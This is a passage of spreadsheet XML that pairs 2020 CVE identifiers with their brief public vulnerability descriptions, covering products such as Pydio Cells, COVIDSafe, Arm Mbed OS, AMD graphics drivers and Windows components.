    <t>eQ-3 Homematic Central Control Unit (CCU)2 through 2.51.6 and CCU3 through 3.51.6 allow Remote Code Execution in the JSON API Method ReGa.runScript, by unauthenticated attackers with access to the web interface, due to the default auto-login feature being enabled during first-time setup (or factory reset).</t>
  </si>
  <si>
    <t>CVE-2020-12835</t>
  </si>
  <si>
    <t>An issue was discovered in SmartBear ReadyAPI SoapUI Pro 3.2.5. Due to unsafe use of an Java RMI based protocol in an unsafe configuration, an attacker can inject malicious serialized objects into the communication, resulting in remote code execution in the context of a client-side Network Licensing Protocol component.</t>
  </si>
  <si>
    <t>CVE-2020-12837</t>
  </si>
  <si>
    <t>ismartgate PRO 1.5.9 is vulnerable to malicious file uploads via the form for uploading images to garage doors. The magic bytes of PNG must be used.</t>
  </si>
  <si>
    <t>CVE-2020-12838</t>
  </si>
  <si>
    <t>ismartgate PRO 1.5.9 is vulnerable to privilege escalation by appending PHP code to /cron/mailAdmin.php.</t>
  </si>
  <si>
    <t>CVE-2020-12839</t>
  </si>
  <si>
    <t>ismartgate PRO 1.5.9 is vulnerable to privilege escalation by appending PHP code to /cron/checkExpirationDate.php.</t>
  </si>
  <si>
    <t>CVE-2020-1284</t>
  </si>
  <si>
    <t>A denial of service vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests, aka 'Windows SMBv3 Client/Server Denial of Service Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-12840</t>
  </si>
  <si>
    <t>ismartgate PRO 1.5.9 is vulnerable to CSRF that allows remote attackers to upload sound files via /index.php</t>
  </si>
  <si>
    <t>CVE-2020-12841</t>
  </si>
  <si>
    <t>ismartgate PRO 1.5.9 is vulnerable to CSRF that allows remote attackers to upload imae files via /index.php</t>
  </si>
  <si>
    <t>CVE-2020-12842</t>
  </si>
  <si>
    <t>ismartgate PRO 1.5.9 is vulnerable to privilege escalation by appending PHP code to /cron/checkUserExpirationDate.php.</t>
  </si>
  <si>
    <t>CVE-2020-12843</t>
  </si>
  <si>
    <t>ismartgate PRO 1.5.9 is vulnerable to malicious file uploads via the form for uploading sounds to garage doors. The magic bytes for WAV must be used.</t>
  </si>
  <si>
    <t>CVE-2020-12845</t>
  </si>
  <si>
    <t>Cherokee 0.4.27 to 1.2.104 is affected by a denial of service due to a NULL pointer dereferences. A remote unauthenticated attacker can crash the server by sending an HTTP request to protected resources using a malformed Authorization header that is mishandled during a cherokee_buffer_add call within cherokee_validator_parse_basic or cherokee_validator_parse_digest.</t>
  </si>
  <si>
    <t>CVE-2020-12846</t>
  </si>
  <si>
    <t>Zimbra before 8.8.15 Patch 10 and 9.x before 9.0.0 Patch 3 allows remote code execution via an avatar file. There is potential abuse of /service/upload servlet in the webmail subsystem. A user can upload executable files (exe,sh,bat,jar) in the Contact section of the mailbox as an avatar image for a contact. A user will receive a "Corrupt File" error, but the file is still uploaded and stored locally in /opt/zimbra/data/tmp/upload/, leaving it open to possible remote execution.</t>
  </si>
  <si>
    <t>CVE-2020-12847</t>
  </si>
  <si>
    <t>Pydio Cells 2.0.4 web application offers an administrative console named “Cells Console” that is available to users with an administrator role. This console provides an administrator user with the possibility of changing several settings, including the application’s mailer configuration. It is possible to configure a few engines to be used by the mailer application to send emails. If the user selects the “sendmail” option as the default one, the web application offers to edit the full path where the sendmail binary is hosted. Since there is no restriction in place while editing this value, an attacker authenticated as an administrator user could force the web application into executing any arbitrary binary.</t>
  </si>
  <si>
    <t>CVE-2020-12848</t>
  </si>
  <si>
    <t>In Pydio Cells 2.0.4, once an authenticated user shares a file selecting the create a public link option, a hidden shared user account is created in the backend with a random username. An anonymous user that obtains a valid public link can get the associated hidden account username and password and proceed to login to the web application. Once logged into the web application with the hidden user account, some actions that were not available with the public share link can now be performed.</t>
  </si>
  <si>
    <t>CVE-2020-12849</t>
  </si>
  <si>
    <t>Pydio Cells 2.0.4 allows any user to upload a profile image to the web application, including standard and shared user roles. These profile pictures can later be accessed directly with the generated URL by any unauthenticated or authenticated user.</t>
  </si>
  <si>
    <t>CVE-2020-1285</t>
  </si>
  <si>
    <t>CVE-2020-12850</t>
  </si>
  <si>
    <t>The following vulnerability applies only to the Pydio Cells Enterprise OVF version 2.0.4. Prior versions of the Pydio Cells Enterprise OVF (such as version 2.0.3) have a looser policy restriction allowing the “pydio” user to execute any privileged command using sudo. In version 2.0.4 of the appliance, the user pydio is responsible for running all the services and binaries that are contained in the Pydio Cells web application package, such as mysqld, cells, among others. This user has privileges restricted to run those services and nothing more.</t>
  </si>
  <si>
    <t>CVE-2020-12851</t>
  </si>
  <si>
    <t>Pydio Cells 2.0.4 allows an authenticated user to write or overwrite existing files in another user’s personal and cells folders (repositories) by uploading a custom generated ZIP file and leveraging the file extraction feature present in the web application. The extracted files will be placed in the targeted user folders.</t>
  </si>
  <si>
    <t>CVE-2020-12852</t>
  </si>
  <si>
    <t>The update feature for Pydio Cells 2.0.4 allows an administrator user to set a custom update URL and the public RSA key used to validate the downloaded update package. The update process involves downloading the updated binary file from a URL indicated in the update server response, validating its checksum and signature with the provided public key and finally replacing the current application binary. To complete the update process, the application’s service or appliance needs to be restarted. An attacker with administrator access can leverage the software update feature to force the application to download a custom binary that will replace current Pydio Cells binary. When the server or service is eventually restarted the attacker will be able to execute code under the privileges of the user running the application. In the Pydio Cells enterprise appliance this is with the privileges of the user named “pydio”.</t>
  </si>
  <si>
    <t>CVE-2020-12853</t>
  </si>
  <si>
    <t>Pydio Cells 2.0.4 allows XSS. A malicious user can either upload or create a new file that contains potentially malicious HTML and JavaScript code to personal folders or accessible cells.</t>
  </si>
  <si>
    <t>CVE-2020-12854</t>
  </si>
  <si>
    <t>A remote code execution vulnerability was identified in SecZetta NEProfile 3.3.11. Authenticated remote adversaries can invoke code execution upon uploading a carefully crafted JPEG file as part of the profile avatar.</t>
  </si>
  <si>
    <t>CVE-2020-12855</t>
  </si>
  <si>
    <t>A Host header injection vulnerability has been discovered in SecZetta NEProfile 3.3.11. Authenticated remote adversaries can poison this header resulting in an adversary controlling the execution flow for the 302 HTTP status.</t>
  </si>
  <si>
    <t>CVE-2020-12856</t>
  </si>
  <si>
    <t>OpenTrace, as used in COVIDSafe through v1.0.17, TraceTogether, ABTraceTogether, and other applications on iOS and Android, allows remote attackers to conduct long-term re-identification attacks and possibly have unspecified other impact, because of how Bluetooth is used.</t>
  </si>
  <si>
    <t>CVE-2020-12857</t>
  </si>
  <si>
    <t>Caching of GATT characteristic values (TempID) in COVIDSafe v1.0.15 and v1.0.16 allows a remote attacker to long-term re-identify an Android device running COVIDSafe.</t>
  </si>
  <si>
    <t>CVE-2020-12858</t>
  </si>
  <si>
    <t>Non-reinitialisation of random data in the advertising payload in COVIDSafe v1.0.15 and v1.0.16 allows a remote attacker to re-identify Android devices running COVIDSafe by scanning for their advertising beacons.</t>
  </si>
  <si>
    <t>CVE-2020-12859</t>
  </si>
  <si>
    <t>Unnecessary fields in the OpenTrace/BlueTrace protocol in COVIDSafe through v1.0.17 allow a remote attacker to identify a device model by observing cleartext payload data. This allows re-identification of devices, especially less common phone models or those in low-density situations.</t>
  </si>
  <si>
    <t>CVE-2020-1286</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when the Windows Shell does not properly validate file paths.An attacker who successfully exploited this vulnerability could run arbitrary code in the context of the current user, aka 'Windows Shell Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-12860</t>
  </si>
  <si>
    <t>COVIDSafe through v1.0.17 allows a remote attacker to access phone name and model information because a BLE device can have four roles and COVIDSafe uses all of them. This allows for re-identification of a device, and potentially identification of the owner's name.</t>
  </si>
  <si>
    <t>CVE-2020-12861</t>
  </si>
  <si>
    <t>A heap buffer overflow in SANE Backends before 1.0.30 allows a malicious device connected to the same local network as the victim to execute arbitrary code, aka GHSL-2020-080.</t>
  </si>
  <si>
    <t>CVE-2020-12862</t>
  </si>
  <si>
    <t>An out-of-bounds read in SANE Backends before 1.0.30 may allow a malicious device connected to the same local network as the victim to read important information, such as the ASLR offsets of the program, aka GHSL-2020-082.</t>
  </si>
  <si>
    <t>CVE-2020-12863</t>
  </si>
  <si>
    <t>An out-of-bounds read in SANE Backends before 1.0.30 may allow a malicious device connected to the same local network as the victim to read important information, such as the ASLR offsets of the program, aka GHSL-2020-083.</t>
  </si>
  <si>
    <t>CVE-2020-12864</t>
  </si>
  <si>
    <t>An out-of-bounds read in SANE Backends before 1.0.30 may allow a malicious device connected to the same local network as the victim to read important information, such as the ASLR offsets of the program, aka GHSL-2020-081.</t>
  </si>
  <si>
    <t>CVE-2020-12865</t>
  </si>
  <si>
    <t>A heap buffer overflow in SANE Backends before 1.0.30 may allow a malicious device connected to the same local network as the victim to execute arbitrary code, aka GHSL-2020-084.</t>
  </si>
  <si>
    <t>CVE-2020-12866</t>
  </si>
  <si>
    <t>A NULL pointer dereference in SANE Backends before 1.0.30 allows a malicious device connected to the same local network as the victim to cause a denial of service, GHSL-2020-079.</t>
  </si>
  <si>
    <t>CVE-2020-12867</t>
  </si>
  <si>
    <t>A NULL pointer dereference in sanei_epson_net_read in SANE Backends before 1.0.30 allows a malicious device connected to the same local network as the victim to cause a denial of service, aka GHSL-2020-075.</t>
  </si>
  <si>
    <t>CVE-2020-12869</t>
  </si>
  <si>
    <t>RainbowFish PacsOne Server 6.8.4 allows XSS.</t>
  </si>
  <si>
    <t>CVE-2020-1287</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory, aka 'Windows WalletService Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1294.</t>
  </si>
  <si>
    <t>CVE-2020-12870</t>
  </si>
  <si>
    <t>RainbowFish PacsOne Server 6.8.4 allows SQL injection on the username parameter in the signup page.</t>
  </si>
  <si>
    <t>CVE-2020-12872</t>
  </si>
  <si>
    <t>yaws_config.erl in Yaws through 2.0.2 and/or 2.0.7 loads obsolete TLS ciphers, as demonstrated by ones that allow Sweet32 attacks, if running on an Erlang/OTP virtual machine with a version less than 21.0.</t>
  </si>
  <si>
    <t>CVE-2020-12873</t>
  </si>
  <si>
    <t>An issue was discovered in Alfresco Enterprise Content Management (ECM) before 6.2.1. A user with privileges to edit a FreeMarker template (e.g., a webscript) may execute arbitrary Java code or run arbitrary system commands with the same privileges as the account running Alfresco.</t>
  </si>
  <si>
    <t>CVE-2020-12874</t>
  </si>
  <si>
    <t>Veritas APTARE versions prior to 10.4 included code that bypassed the normal login process when specific authentication credentials were provided to the server.</t>
  </si>
  <si>
    <t>CVE-2020-12875</t>
  </si>
  <si>
    <t>Veritas APTARE versions prior to 10.4 did not perform adequate authorization checks. An authenticated user could gain unauthorized access to sensitive information or functionality by manipulating specific parameters within the application.</t>
  </si>
  <si>
    <t>CVE-2020-12876</t>
  </si>
  <si>
    <t>Veritas APTARE versions prior to 10.4 allowed remote users to access several unintended files on the server. This vulnerability only impacts Windows server deployments.</t>
  </si>
  <si>
    <t>CVE-2020-12877</t>
  </si>
  <si>
    <t>Veritas APTARE versions prior to 10.4 allowed sensitive information to be accessible without authentication.</t>
  </si>
  <si>
    <t>CVE-2020-12878</t>
  </si>
  <si>
    <t>Digi ConnectPort X2e before 3.2.30.6 allows an attacker to escalate privileges from the python user to root via a symlink attack that uses chown, related to /etc/init.d/S50dropbear.sh and the /WEB/python/.ssh directory.</t>
  </si>
  <si>
    <t>CVE-2020-12880</t>
  </si>
  <si>
    <t>An issue was discovered in Pulse Policy Secure (PPS) and Pulse Connect Secure (PCS) Virtual Appliance before 9.1R8. By manipulating a certain kernel boot parameter, it can be tricked into dropping into a root shell in a pre-install phase where the entire source code of the appliance is available and can be retrieved. (The source code is otherwise inaccessible because the appliance has its hard disks encrypted, and no root shell is available during normal operation.)</t>
  </si>
  <si>
    <t>CVE-2020-12882</t>
  </si>
  <si>
    <t>Submitty through 20.04.01 allows XSS via upload of an SVG document, as demonstrated by an attack by a Student against a Teaching Fellow.</t>
  </si>
  <si>
    <t>CVE-2020-12883</t>
  </si>
  <si>
    <t>Buffer over-reads were discovered in the CoAP library in Arm Mbed OS 5.15.3. The CoAP parser is responsible for parsing received CoAP packets. The function sn_coap_parser_options_parse() parses CoAP input linearly using a while loop. Once an option is parsed in a loop, the current point (*packet_data_pptr) is increased correspondingly. The pointer is restricted by the size of the received buffer, as well as by the option delta and option length bytes. The actual input packet length is not verified against the number of bytes read when processing the option extended delta and the option extended length. Moreover, the calculation of the message_left variable, in the case of non-extended option deltas, is incorrect and indicates more data left for processing than provided in the function input. All of these lead to heap-based or stack-based memory location read access that is outside of the intended boundary of the buffer. Depending on the platform-specific memory management mechanisms, it can lead to processing of unintended inputs or system memory access violation errors.</t>
  </si>
  <si>
    <t>CVE-2020-12884</t>
  </si>
  <si>
    <t>A buffer over-read was discovered in the CoAP library in Arm Mbed OS 5.15.3. The CoAP parser is responsible for parsing received CoAP packets. The function sn_coap_parser_options_parse_multiple_options() parses CoAP options that may occur multiple consecutive times in a single packet. While processing the options, packet_data_pptr is accessed after being incremented by option_len without a prior out-of-bounds memory check. The temp_parsed_uri_query_ptr is validated for a correct range, but the range valid for temp_parsed_uri_query_ptr is derived from the amount of allocated heap memory, not the actual input size. Therefore the check of temp_parsed_uri_query_ptr may be insufficient for safe access to the area pointed to by packet_data_pptr. As a result, access to a memory area outside of the intended boundary of the packet buffer is made.</t>
  </si>
  <si>
    <t>CVE-2020-12885</t>
  </si>
  <si>
    <t>An infinite loop was discovered in the CoAP library in Arm Mbed OS 5.15.3. The CoAP parser is responsible for parsing received CoAP packets. The function sn_coap_parser_options_parse_multiple_options() parses CoAP options in a while loop. This loop's exit condition is computed using the previously allocated heap memory required for storing the result of parsing multiple options. If the input heap memory calculation results in zero bytes, the loop exit condition is never met and the loop is not terminated. As a result, the packet parsing function never exits, leading to resource consumption.</t>
  </si>
  <si>
    <t>CVE-2020-12886</t>
  </si>
  <si>
    <t>A buffer over-read was discovered in the CoAP library in Arm Mbed OS 5.15.3. The CoAP parser is responsible for parsing received CoAP packets. The function sn_coap_parser_options_parse() parses the CoAP packet header starting from the message token. The length of the token in the received message is provided in the first byte parsed by the sn_coap_parser_options_parse() function. The length encoded in the message is not validated against the actual input buffer length before accessing the token. As a result, memory access outside of the intended boundary of the buffer may occur.</t>
  </si>
  <si>
    <t>CVE-2020-12887</t>
  </si>
  <si>
    <t>Memory leaks were discovered in the CoAP library in Arm Mbed OS 5.15.3 when using the Arm mbed-coap library 5.1.5. The CoAP parser is responsible for parsing received CoAP packets. The function sn_coap_parser_options_parse() parses the CoAP option number field of all options present in the input packet. Each option number is calculated as a sum of the previous option number and a delta of the current option. The delta and the previous option number are expressed as unsigned 16-bit integers. Due to lack of overflow detection, it is possible to craft a packet that wraps the option number around and results in the same option number being processed again in a single packet. Certain options allocate memory by calling a memory allocation function. In the cases of COAP_OPTION_URI_QUERY, COAP_OPTION_URI_PATH, COAP_OPTION_LOCATION_QUERY, and COAP_OPTION_ETAG, there is no check on whether memory has already been allocated, which in conjunction with the option number integer overflow may lead to multiple assignments of allocated memory to a single pointer. This has been demonstrated to lead to memory leak by buffer orphaning. As a result, the memory is never freed.</t>
  </si>
  <si>
    <t>CVE-2020-12888</t>
  </si>
  <si>
    <t>The VFIO PCI driver in the Linux kernel through 5.6.13 mishandles attempts to access disabled memory space.</t>
  </si>
  <si>
    <t>CVE-2020-12889</t>
  </si>
  <si>
    <t>MISP MISP-maltego 1.4.4 incorrectly shares a MISP connection across users in a remote-transform use case.</t>
  </si>
  <si>
    <t>CVE-2020-1289</t>
  </si>
  <si>
    <t>A spoofing vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft SharePoint Spoofing Vulnerability'. This CVE ID is unique from CVE-2020-1148.</t>
  </si>
  <si>
    <t>CVE-2020-12890</t>
  </si>
  <si>
    <t>Improper handling of pointers in the System Management Mode (SMM) handling code may allow for a privileged attacker with physical or administrative access to potentially manipulate the AMD Generic Encapsulated Software Architecture (AGESA) to execute arbitrary code undetected by the operating system.</t>
  </si>
  <si>
    <t>CVE-2020-12891</t>
  </si>
  <si>
    <t>AMD Radeon Software may be vulnerable to DLL Hijacking through path variable. An unprivileged user may be able to drop its malicious DLL file in any location which is in path environment variable.</t>
  </si>
  <si>
    <t>CVE-2020-12892</t>
  </si>
  <si>
    <t>An untrusted search path in AMD Radeon settings Installer may lead to a privilege escalation or unauthorized code execution.</t>
  </si>
  <si>
    <t>CVE-2020-12893</t>
  </si>
  <si>
    <t>Stack Buffer Overflow in AMD Graphics Driver for Windows 10 in Escape 0x15002a may lead to escalation of privilege or denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-12894</t>
  </si>
  <si>
    <t>Arbitrary Write in AMD Graphics Driver for Windows 10 in Escape 0x40010d may lead to arbitrary write to kernel memory or denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-12895</t>
  </si>
  <si>
    <t>Pool/Heap Overflow in AMD Graphics Driver for Windows 10 in Escape 0x110037 may lead to escalation of privilege, information disclosure or denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-12897</t>
  </si>
  <si>
    <t>Kernel Pool Address disclosure in AMD Graphics Driver for Windows 10 may lead to KASLR bypass.</t>
  </si>
  <si>
    <t>CVE-2020-12898</t>
  </si>
  <si>
    <t>Stack Buffer Overflow in AMD Graphics Driver for Windows 10 may lead to escalation of privilege or denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-12899</t>
  </si>
  <si>
    <t>Arbitrary Read in AMD Graphics Driver for Windows 10 may lead to KASLR bypass or denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-1290</t>
  </si>
  <si>
    <t>CVE-2020-12900</t>
  </si>
  <si>
    <t>An arbitrary write vulnerability in the AMD Radeon Graphics Driver for Windows 10 potentially allows unprivileged users to gain Escalation of Privileges and cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2020-12901</t>
  </si>
  <si>
    <t>Arbitrary Free After Use in AMD Graphics Driver for Windows 10 may lead to KASLR bypass or information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-12902</t>
  </si>
  <si>
    <t>Arbitrary Decrement Privilege Escalation in AMD Graphics Driver for Windows 10 may lead to escalation of privilege or denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-12903</t>
  </si>
  <si>
    <t>Out of Bounds Write and Read in AMD Graphics Driver for Windows 10 in Escape 0x6002d03 may lead to escalation of privilege or denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-12904</t>
  </si>
  <si>
    <t>Out of Bounds Read in AMD Graphics Driver for Windows 10 in Escape 0x3004203 may lead to arbitrary information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-12905</t>
  </si>
  <si>
    <t>Out of Bounds Read in AMD Graphics Driver for Windows 10 in Escape 0x3004403 may lead to arbitrary information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-1291</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory, aka 'Windows Network Connections Service Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-12911</t>
  </si>
  <si>
    <t>A denial of service vulnerability exists in the D3DKMTCreateAllocation handler functionality of AMD ATIKMDAG.SYS (e.g. version 26.20.15029.27017). A specially crafted D3DKMTCreateAllocation API request can cause an out-of-bounds read and denial of service (BSOD). This vulnerability can be triggered from a non-privileged account.</t>
  </si>
  <si>
    <t>CVE-2020-12912</t>
  </si>
  <si>
    <t>A potential vulnerability in the AMD extension to Linux "hwmon" service may allow an attacker to use the Linux-based Running Average Power Limit (RAPL) interface to show various side channel attacks. In line with industry partners, AMD has updated the RAPL interface to require privileged access.</t>
  </si>
  <si>
    <t>CVE-2020-1292</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in OpenSSH for Windows when it does not properly restrict access to configuration settings, aka 'OpenSSH for Windows Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-12920</t>
  </si>
  <si>
    <t>A potential denial of service issue exists in the AMD Display driver Escape 0x130007 Call handler. An attacker with low privilege could potentially induce a Windows BugCheck.</t>
  </si>
  <si>
    <t>CVE-2020-12926</t>
  </si>
  <si>
    <t>The Trusted Platform Modules (TPM) reference software may not properly track the number of times a failed shutdown happens. This can leave the TPM in a state where confidential key material in the TPM may be able to be compromised. AMD believes that the attack requires physical access of the device because the power must be repeatedly turned on and off. This potential attack may be used to change confidential information, alter executables signed by key material in the TPM, or create a denial of service of the device.</t>
  </si>
  <si>
    <t>CVE-2020-12927</t>
  </si>
  <si>
    <t>A potential vulnerability in a dynamically loaded AMD driver in AMD VBIOS Flash Tool SDK may allow any authenticated user to escalate privileges to NT authority system.</t>
  </si>
  <si>
    <t>CVE-2020-12928</t>
  </si>
  <si>
    <t>A vulnerability in a dynamically loaded AMD driver in AMD Ryzen Master V15 may allow any authenticated user to escalate privileges to NT authority system.</t>
  </si>
  <si>
    <t>CVE-2020-12929</t>
  </si>
  <si>
    <t>Improper parameters validation in some trusted applications of the PSP contained in the AMD Graphics Driver may allow a local attacker to bypass security restrictions and achieve arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-1293</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations, aka 'Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1257, CVE-2020-1278.</t>
  </si>
  <si>
    <t>CVE-2020-12930</t>
  </si>
  <si>
    <t>Improper parameters handling in AMD Secure Processor (ASP) drivers may allow a privileged attacker to elevate their privileges potentially leading to loss of integrity.</t>
  </si>
  <si>
    <t>CVE-2020-12931</t>
  </si>
  <si>
    <t>Improper parameters handling in the AMD Secure Processor (ASP) kernel may allow a privileged attacker to elevate their privileges potentially leading to loss of integrity.</t>
  </si>
  <si>
    <t>CVE-2020-12933</t>
  </si>
  <si>
    <t>A denial of service vulnerability exists in the D3DKMTEscape handler functionality of AMD ATIKMDAG.SYS (e.g. version 26.20.15029.27017). A specially crafted D3DKMTEscape API request can cause an out-of-bounds read in Windows OS kernel memory area. This vulnerability can be triggered from a non-privileged account.</t>
  </si>
  <si>
    <t>CVE-2020-1294</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory, aka 'Windows WalletService Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1287.</t>
  </si>
  <si>
    <t>CVE-2020-12944</t>
  </si>
  <si>
    <t>Insufficient validation of BIOS image length by ASP Firmware could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-12946</t>
  </si>
  <si>
    <t>Insufficient input validation in ASP firmware for discrete TPM commands could allow a potential loss of integrity and denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-1295</t>
  </si>
  <si>
    <t>CVE-2020-12951</t>
  </si>
  <si>
    <t>Race condition in ASP firmware could allow less privileged x86 code to perform ASP SMM (System Management Mode) operations.</t>
  </si>
  <si>
    <t>CVE-2020-12954</t>
  </si>
  <si>
    <t>A side effect of an integrated chipset option may be able to be used by an attacker to bypass SPI ROM protections, allowing unauthorized SPI ROM modification.</t>
  </si>
  <si>
    <t>CVE-2020-1296</t>
  </si>
  <si>
    <t>A vulnerability exists in the way the Windows Diagnostics &amp;amp; feedback settings app handles objects in memory, aka 'Windows Diagnostics &amp; feedback Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-12960</t>
  </si>
  <si>
    <t>AMD Graphics Driver for Windows 10, amdfender.sys may improperly handle input validation on InputBuffer which may result in a denial of service (DoS).</t>
  </si>
  <si>
    <t>CVE-2020-12961</t>
  </si>
  <si>
    <t>A potential vulnerability exists in AMD Platform Security Processor (PSP) that may allow an attacker to zero any privileged register on the System Management Network which may lead to bypassing SPI ROM protections.</t>
  </si>
  <si>
    <t>CVE-2020-12962</t>
  </si>
  <si>
    <t>Escape call interface in the AMD Graphics Driver for Windows may cause privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2020-12963</t>
  </si>
  <si>
    <t>An insufficient pointer validation vulnerability in the AMD Graphics Driver for Windows may allow unprivileged users to compromise the system.</t>
  </si>
  <si>
    <t>CVE-2020-12964</t>
  </si>
  <si>
    <t>A potential privilege escalation/denial of service issue exists in the AMD Radeon Kernel Mode driver Escape 0x2000c00 Call handler. An attacker with low privilege could potentially induce a Windows BugCheck or write to leak information.</t>
  </si>
  <si>
    <t>CVE-2020-12965</t>
  </si>
  <si>
    <t>When combined with specific software sequences, AMD CPUs may transiently execute non-canonical loads and store using only the lower 48 address bits potentially resulting in data leakage.</t>
  </si>
  <si>
    <t>CVE-2020-12966</t>
  </si>
  <si>
    <t>AMD EPYC™ Processors contain an information disclosure vulnerability in the Secure Encrypted Virtualization with Encrypted State (SEV-ES) and Secure Encrypted Virtualization with Secure Nested Paging (SEV-SNP). A local authenticated attacker could potentially exploit this vulnerability leading to leaking guest data by the malicious hypervisor.</t>
  </si>
  <si>
    <t>CVE-2020-12967</t>
  </si>
  <si>
    <t>The lack of nested page table protection in the AMD SEV/SEV-ES feature could potentially lead to arbitrary code execution within the guest VM if a malicious administrator has access to compromise the server hypervisor.</t>
  </si>
  <si>
    <t>CVE-2020-1297</t>
  </si>
  <si>
    <t>A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1177, CVE-2020-1183, CVE-2020-1298, CVE-2020-1318, CVE-2020-1320.</t>
  </si>
  <si>
    <t>CVE-2020-1298</t>
  </si>
  <si>
    <t>A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1177, CVE-2020-1183, CVE-2020-1297, CVE-2020-1318, CVE-2020-1320.</t>
  </si>
  <si>
    <t>CVE-2020-12980</t>
  </si>
  <si>
    <t>An out of bounds write and read vulnerability in the AMD Graphics Driver for Windows 10 may lead to escalation of privilege or denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-12981</t>
  </si>
  <si>
    <t>An insufficient input validation in the AMD Graphics Driver for Windows 10 may allow unprivileged users to unload the driver, potentially causing memory corruptions in high privileged processes, which can lead to escalation of privileges or denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-12982</t>
  </si>
  <si>
    <t>An invalid object pointer free vulnerability in the AMD Graphics Driver for Windows 10 may lead to escalation of privilege or denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-12983</t>
  </si>
  <si>
    <t>An out of bounds write vulnerability in the AMD Graphics Driver for Windows 10 may lead to escalation of privileges or denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-12985</t>
  </si>
  <si>
    <t>An insufficient pointer validation vulnerability in the AMD Graphics Driver for Windows 10 may lead to escalation of privilege or denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-12986</t>
  </si>
  <si>
    <t>An insufficient pointer validation vulnerability in the AMD Graphics Driver for Windows 10 may cause arbitrary code execution in the kernel, leading to escalation of privilege or denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-12987</t>
  </si>
  <si>
    <t>A heap information leak/kernel pool address disclosure vulnerability in the AMD Graphics Driver for Windows 10 may lead to KASLR bypass.</t>
  </si>
  <si>
    <t>CVE-2020-12988</t>
  </si>
  <si>
    <t>A potential denial of service (DoS) vulnerability exists in the integrated chipset that may allow a malicious attacker to hang the system when it is rebooted.</t>
  </si>
  <si>
    <t>CVE-2020-1299</t>
  </si>
  <si>
    <t>CVE-2020-1300</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files.To exploit the vulnerability, an attacker would have to convince a user to either open a specially crafted cabinet file or spoof a network printer and trick a user into installing a malicious cabinet file disguised as a printer driver.The update addresses the vulnerability by correcting how Windows handles cabinet files., aka 'Windows Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-1301</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests, aka 'Windows SMB Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-1302</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations.To exploit the vulnerability, an attacker would require unprivileged execution on the victim system, aka 'Windows Installer Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1272, CVE-2020-1277, CVE-2020-1312.</t>
  </si>
  <si>
    <t>CVE-2020-1303</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1169.</t>
  </si>
  <si>
    <t>CVE-2020-1304</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1231, CVE-2020-1233, CVE-2020-1235, CVE-2020-1265, CVE-2020-1282, CVE-2020-1306, CVE-2020-1334.</t>
  </si>
  <si>
    <t>CVE-2020-1305</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-1306</t>
  </si>
  <si>
